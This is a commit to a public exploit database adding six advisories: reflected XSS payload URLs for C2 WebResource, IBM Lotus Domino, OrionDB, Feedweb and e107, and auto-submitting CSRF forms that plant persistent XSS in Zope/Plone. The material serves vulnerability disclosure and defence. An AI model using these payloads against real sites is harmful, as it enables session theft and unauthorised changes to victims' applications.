DB: 2015-10-08

6 new exploits
2015-10-08 05:02:23 +00:00 · 2015-10-08 05:02:23 +00:00 · 0f12501e2c
commit 0f12501e2c
parent fb214069db
7 changed files with 211 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -34693,3 +34693,9 @@ id,file,description,date,author,platform,type,port
 38408,platforms/php/webapps/38408.txt,"Jaow CMS 'add_ons' Parameter Cross Site Scripting Vulnerability",2013-03-23,Metropolis,php,webapps,0
 38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N Unauthenticated Config Download",2015-10-06,"Todor Donev",hardware,webapps,0
 38410,platforms/php/webapps/38410.txt,"WordPress Banners Lite Plugin 'wpbanners_show.php' HTML Injection Vulnerability",2013-03-25,"Fernando A. Lagos B",php,webapps,0
+38411,platforms/python/webapps/38411.txt,"Zope Management Interface 4.3.7 - CSRF Vulnerabilities",2015-10-07,hyp3rlinx,python,webapps,0
+38412,platforms/multiple/remote/38412.txt,"IBM Lotus Domino 8.5.x 'x.nsf' Multiple Cross Site Scripting Vulnerabilities",2013-03-26,MustLive,multiple,remote,0
+38413,platforms/php/webapps/38413.txt,"OrionDB Web Directory Multiple Cross Site Scripting Vulnerabilities",2013-03-27,3spi0n,php,webapps,0
+38414,platforms/php/webapps/38414.txt,"WordPress Feedweb Plugin 'wp_post_id' Parameter Cross Site Scripting Vulnerability",2013-03-30,"Stefan Schurtz",php,webapps,0
+38415,platforms/asp/webapps/38415.txt,"C2 WebResource 'File' Parameter Cross Site Scripting Vulnerability",2013-04-03,anonymous,asp,webapps,0
+38416,platforms/php/webapps/38416.txt,"e107 'content_preset.php' Cross Site Scripting Vulnerability",2013-04-03,"Simon Bieber",php,webapps,0
--- a/platforms/asp/webapps/38415.txt
+++ b/platforms/asp/webapps/38415.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/58838/info
+
+C2 WebResource is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/fileview.asp?File=<script>alert(document.cookie)</script> 
--- a/platforms/multiple/remote/38412.txt
+++ b/platforms/multiple/remote/38412.txt
@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/58715/info
+
+IBM Lotus Domino is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+IBM Lotus Domino 8.5.4 and prior are vulnerable. 
+
+http://www.example.com/mail/x.nsf/CalendarFS?OpenFrameSet&Frame=NotesView&Src=data:text/html; base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
+
+http://www.example.com/mail/x.nsf/WebInteriorCalendarFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
+
+http://www.example.com/mail/x.nsf/ToDoFS?OpenFrameSet?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
+
+http://www.example.com/mail/x.nsf/WebInteriorToDoFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B 
--- a/platforms/php/webapps/38413.txt
+++ b/platforms/php/webapps/38413.txt
@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/58720/info
+
+OrionDB Web Directory is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/wd-demo/index.php?c=<script >prompt(35)</script>
+http://www.example.com/wd-demo/index.php?c=search&category=Food&searchtext=1</title><h1>3spi0n</h1><script >prompt(35)</script> 
--- a/platforms/php/webapps/38414.txt
+++ b/platforms/php/webapps/38414.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58771/info
+
+Feedweb plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Feedweb 1.8.8 and prior versions are vulnerable. 
+
+ http://www.example.com/wordpress/wp-content/plugins/feedweb/widget_remove.php?wp_post_id=[XSS] 
--- a/platforms/php/webapps/38416.txt
+++ b/platforms/php/webapps/38416.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58841/info
+
+e107 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+e107 1.0.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/e107_plugins/content/handlers/content_preset.php? %3c%00script%0d%0a>alert('reflexted%20XSS')</script> 
--- a/platforms/python/webapps/38411.txt
+++ b/platforms/python/webapps/38411.txt
@ -0,0 +1,157 @@
+[+] Credits: hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-ZOPE-CSRF.txt
+
+
+Vendor:
+================================
+www.zope.org
+plone.org
+
+
+Product:
+================================
+Zope Management Interface 4.3.7
+
+Zope is a Python-based application server for building secure and highly
+scalable web applications.
+Plone Is a Content Management System built on top of the open source
+application server Zope
+and the accompanying Content Management Framework.
+
+
+Vulnerability Type:
+===================
+Cross site request forgery (CSRF)
+
+Multiple CSRF (cross-site request forgery) vulnerabilities in the ZMI (Zope
+Management Interface).
+Patches to Zope and Plone for multiple CSRF issues.
+
+https://plone.org/security/20151006/multiple-csrf-vulnerabilities-in-zope
+https://plone.org/products/plone/security/advisories/security-vulnerability-20151006-csrf
+
+
+CVE Reference:
+==============
+NA
+
+
+Vulnerability Details:
+=====================
+
+Security vulnerability: 20151006 - CSRF
+ZMI is mostly unprotected from CSRF vulnerabilities.
+
+Versions affected
+
+4.3.7, 4.3.6, 4.3.5, 4.3.4, 4.3.3, 4.3.2, 4.3.1, 4.3, 4.2.7, 4.2.6, 4.2.5,
+4.2.4, 4.2.3, 4.2.2, 4.2.1, 4.2
+4.1.6, 4.1.5, 4.1.4, 4.1.3, 4.1.2, 4.1.1, 4.1, 4.0.9, 4.0.7, 4.0.5, 4.0.4,
+4.0.3, 4.0.2, 4.0.1, 4.0, 3.3.6
+3.3.5, 3.3.4. 3.3.3, 3.3.2, 3.3.1, 3.3
+
+All versions of Plone prior to 5.x are vulnerable.
+
+
+Fixed by
+Nathan Van Gheem, of the Plone Security Team
+Coordinated by Plone Security Team
+
+patch was released and is available from
+https://pypi.python.org/pypi/plone4.csrffixes
+
+
+Exploit code(s):
+===============
+
+<!DOCTYPE>
+<html>
+<head>
+<title>Plone CSRF Add Linxs & Persistent XSS</title>
+
+<body onLoad="doit()">
+
+<script>
+function doit(){
+var e=document.getElementById('HELL')
+e.submit()
+}
+</script>
+
+ <form id="HELL" method="post"  action="
+http://localhost:8080/Plone/Members/portal_factory/Link/link.2015-08-30.6666666666/atct_edit
+">
+          <input type="text" name="title" id="title" value="HYP3RLINX"
+size="30" maxlength="255" placeholder="" />
+          <input type="text" name="remoteUrl"  id="remoteUrl" value="
+http://hyp3rlinx.altervista.org" size="30" maxlength="511" placeholder="" />
+     <input type="hidden" name="fieldset" value="default" />
+          <input type="hidden" name="form.submitted" value="1" />
+</form>
+
+
+2) CSRF to Persistent XSS -  Zope Management Interface
++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+Persistent XSS via CSRF on title change properties tab, this will execute
+on each Zope page accessed by users.
+
+CSRF to Persistent XSS POC Code:
+=================================
+
+<form id="HELL" action="http://localhost:8080/" method="post">
+<input type="text" name="title:UTF-8:string" size="35"
+value="</title><script>alert('XSS by hyp3rlinx 08302015')</script>" />
+ <input name="manage_editProperties:method"  value="Save Changes" />
+</form>
+
+
+Disclosure Timeline:
+=========================================================
+Vulnerability reported: 2015-08-30
+Hotfix released: 2015-10-06
+
+
+Exploitation Technique:
+=======================
+Remote
+Vector        NETWORK
+Complexity LOW
+Authentication NONE
+Confidentiality NONE
+Integrity PARTIAL
+Availability PARTIAL
+
+
+Severity Level:
+=========================================================
+6.4 – MEDIUM
+
+
+Description:
+==========================================================
+
+
+Request Method(s):              [+]  POST
+
+
+Vulnerable Product:             [+]  Zope Management Interface & all
+versions of Plone prior to 5.x are vulnerable.
+
+
+===========================================================
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author.
+The author is not responsible for any misuse of the information contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.
+
+by hyp3rlinx